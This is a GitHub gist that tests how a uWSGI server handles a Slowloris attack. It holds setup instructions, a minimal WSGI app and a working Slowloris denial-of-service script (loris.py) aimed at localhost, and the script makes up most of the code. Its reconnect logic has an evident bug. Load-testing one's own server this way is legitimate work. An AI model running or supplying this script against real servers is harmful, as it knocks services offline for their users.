Skip to content

Instantly share code, notes, and snippets.

@csinchok

csinchok/README.md

Last active August 29, 2015 14:25
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save csinchok/82bd53370fe3bd97bec4 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save csinchok/82bd53370fe3bd97bec4 to your computer and use it in GitHub Desktop.
Download ZIP
uWSGI SlowLoris Test
Raw
README.md

This is a test to see how uWSGI handles a slowloris attack. To run it:

In one terminal window, run the uWSGI server (you'll need a fairly recent version of uWSGI)

> uwsgi --http=127.0.0.1:8080 --master --module=testapp:application

In another window, run the attack:

> python loris.py

Now just visit http://127.0.0.1:8080/ in your browser, and see if it responds. Or, in a third tab:

> curl http://127.0.0.1:8080

<!doctype html>
<html lang=en>
    <head>
        <meta charset=utf-8>
        <title>Slowloris Test</title>
    </head>
    <body>
        <p>Slowloris Test</p>
    </body>
</html>
Raw
app.py
DOCUMENT = """
<!doctype html>
<html lang=en>
<head>
<meta charset=utf-8>
<title>Slowloris Test</title>
</head>
<body>
<p>Slowloris Test</p>
</body>
</html>
"""
def application(env, start_response):
start_response("200 OK", [("Content-Type", "text/html")])
return DOCUMENT
Raw
loris.py
# Grabbed this from https://gist.github.com/gkbrk/5de70f35e69343718431
import socket
import random
import time
log_level = 2
def log(text, level=1):
if log_level >= level:
print(text)
list_of_sockets = []
regular_headers = [
"User-agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0",
"Accept-language: en-US,en,q=0.5"
]
ip = '127.0.0.1'
port = 8080
socket_count = 1024
log("Attacking {} with {} sockets.".format(ip, socket_count))
log("Creating sockets...")
for _ in range(socket_count):
try:
log("Creating socket nr {}".format(_), level=2)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(4)
s.connect((ip, port))
except socket.error:
break
list_of_sockets.append(s)
log("Setting up the sockets...")
for s in list_of_sockets:
s.send("GET /?{} HTTP/1.1\r\n".format(random.randint(0, 2000)).encode("utf-8"))
for header in regular_headers:
s.send(bytes("{}\r\n".format(header).encode("utf-8")))
while True:
log("Sending keep-alive headers...")
for s in list_of_sockets:
try:
s.send("X-a: {}\r\n".format(random.randint(1, 5000)).encode("utf-8"))
except socket.error:
list_of_sockets.remove(s)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(4)
s.connect((ip, 80))
for s in list_of_sockets:
s.send("GET /?{} HTTP/1.1\r\n".format(random.randint(0, 2000)).encode("utf-8"))
for header in regular_headers:
s.send(bytes("{}\r\n".format(header).encode("utf-8")))
except socket.error:
continue
time.sleep(15)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment